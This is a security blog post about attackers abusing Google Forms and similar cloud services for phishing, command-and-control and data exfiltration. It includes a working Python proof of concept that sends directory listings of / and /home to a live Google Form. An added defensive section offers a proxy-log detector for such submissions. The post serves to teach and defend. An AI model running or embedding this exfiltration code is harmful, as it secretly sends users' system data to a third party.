Does that traffic to commercial public cloud services and web-based applications seem legitimate to you? Bad actors are abusing the shit out of cloud services: Google Docs, Google Forms, Discord, and others, concealing their badness in TLS and the reputation of big cloud brands. This post is an ongoing notebook on both found abuses of these services and proofs-of-concept to show how they might be abused, as Gogol’s Chichikov abused Tsarist census patterns and plans for big land giveaways, buying “dead souls” from serf-owning provincial nobility to fake legitimacy and get big real estate gains.
OK, this is a stretch of a metaphor, but let me run with it.
First, let us take the example of Google Docs. It costs nothing to set up Google Docs infrastructure, in either design skill or financial outlay. Using throwaway credentials (soon-to-be dead cloud souls), a bad actor can create data stores, forms, and other bits of C2 that can be abandoned before Google slaps them with a TOS violation ban.


Google Forms is increasingly abused as a phishing tool aimed at the most gullible. But because it is essentially a web front end to a Google Sheet, it also works as a data exfiltration channel and as a component of a malware command-and-control system. Take, for example, the following Python snippet (written to be run on a Linux box):
```python
import requests
import subprocess

# Collect the two directory listings that will be "submitted" as form answers.
result1 = subprocess.run("ls", cwd="/", stdout=subprocess.PIPE)
result2 = subprocess.run("ls", cwd="/home", stdout=subprocess.PIPE)

# The formResponse endpoint of the form; each entry.<id> key is one question.
url = 'https://docs.google.com/forms/d/e/1FAIpQLSf11PfDQk90dPdP_54GiFiu2HuH8yHx6rwg6z5pMqnVu24ozw/formResponse'
exfil = {
    # Send the captured stdout text, not the CompletedProcess object itself.
    'entry.1313127478': result1.stdout.decode(),
    'entry.301035952': result2.stdout.decode(),
    'entry.1656783446': 'YourMom',
    'pageHistory': 0,
    'fbzx': 6986343948646835646,
}
x = requests.post(url, data=exfil)
print(x.text)
```
If you run this code, it will send the directory listings of / and /home to a web form I’ve created, which will add them as a row in the Google Sheet that collects the form’s responses.
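The defensive flip side, added here as an example and not part of the original post: the exfil above leaves a recognizable trace wherever the proxy can see the URL path (that is, where TLS is terminated for inspection; with SNI alone you only see docs.google.com). A browser that really submits a form first GETs the form’s viewform page, sends a browser User-Agent, and posts a small body; the script above does none of that. The log format, the sample lines and the thresholds below are constructed for illustration.

```python
"""Flag suspicious Google Forms submissions in web-proxy logs (added example).

Heuristics applied to each POST to a form's /formResponse endpoint:
  * no GET to the same form's /viewform from the same client shortly before
    (a browser loads the form before submitting; a script usually does not);
  * a non-browser User-Agent (e.g. python-requests/...);
  * an unusually large request body for a form submission.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

FORM_RE = re.compile(
    r"https://docs\.google\.com/forms/d/e/(?P<form_id>[A-Za-z0-9_-]+)/"
    r"(?P<action>formResponse|viewform)"
)
BROWSER_UA_RE = re.compile(r"Mozilla/5\.0")
LARGE_BODY = 4096          # bytes; assumed threshold, tune to your environment
VIEW_WINDOW = timedelta(minutes=30)

# Constructed sample proxy log (not real traffic). Tab-separated fields:
# ISO timestamp, client IP, method, URL, request body bytes, User-Agent.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z\t10.0.0.5\tGET\thttps://docs.google.com/forms/d/e/AAAAexample/viewform\t0\tMozilla/5.0 (Windows NT 10.0) Chrome/124.0
2024-05-01T10:01:30Z\t10.0.0.5\tPOST\thttps://docs.google.com/forms/d/e/AAAAexample/formResponse\t512\tMozilla/5.0 (Windows NT 10.0) Chrome/124.0
2024-05-01T10:02:00Z\t10.0.0.9\tPOST\thttps://docs.google.com/forms/d/e/BBBBexample/formResponse\t18000\tpython-requests/2.31.0
2024-05-01T10:03:00Z\t10.0.0.7\tGET\thttps://docs.google.com/forms/d/e/CCCCexample/viewform\t0\tMozilla/5.0 (X11; Linux x86_64) Firefox/125.0
2024-05-01T10:03:10Z\t10.0.0.7\tPOST\thttps://docs.google.com/forms/d/e/CCCCexample/formResponse\t9000\tMozilla/5.0 (X11; Linux x86_64) Firefox/125.0
"""


@dataclass
class Request:
    ts: datetime
    client: str
    method: str
    url: str
    body_bytes: int
    user_agent: str


def parse_log(text):
    """Parse the constructed tab-separated log format into Request objects."""
    reqs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, size, ua = line.split("\t", 5)
        reqs.append(Request(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                            client, method, url, int(size), ua))
    return reqs


def detect_suspicious_submissions(reqs, window=VIEW_WINDOW):
    """Return one alert dict per formResponse POST that trips any heuristic."""
    last_view = {}   # (client, form_id) -> time the client last loaded the form
    alerts = []
    for r in sorted(reqs, key=lambda r: r.ts):
        m = FORM_RE.match(r.url)
        if not m:
            continue
        form_id, action = m.group("form_id"), m.group("action")
        if action == "viewform" and r.method == "GET":
            last_view[(r.client, form_id)] = r.ts
            continue
        if action != "formResponse" or r.method != "POST":
            continue
        reasons = []
        seen = last_view.get((r.client, form_id))
        if seen is None or r.ts - seen > window:
            reasons.append("no prior viewform GET")
        if not BROWSER_UA_RE.search(r.user_agent):
            reasons.append(f"non-browser user agent: {r.user_agent}")
        if r.body_bytes > LARGE_BODY:
            reasons.append(f"large body: {r.body_bytes} bytes")
        if reasons:
            alerts.append({"ts": r.ts.isoformat(), "client": r.client,
                           "form_id": form_id, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_suspicious_submissions(parse_log(SAMPLE_LOG)):
        print(a["ts"], a["client"], a["form_id"], "; ".join(a["reasons"]))
```

On the sample, the python-requests POST from 10.0.0.9 trips all three heuristics, and the browser POST from 10.0.0.7 trips only the body-size check, which is the kind of single-signal hit you would want to triage rather than block on. None of these signals is strong alone: a victim who opens a phishing form from a link has a perfectly normal viewform-then-formResponse pattern, and a script author can set a browser User-Agent in one line. Corroborate with the process that made the connection (EDR) and with whether the form ID has been seen anywhere else in the estate.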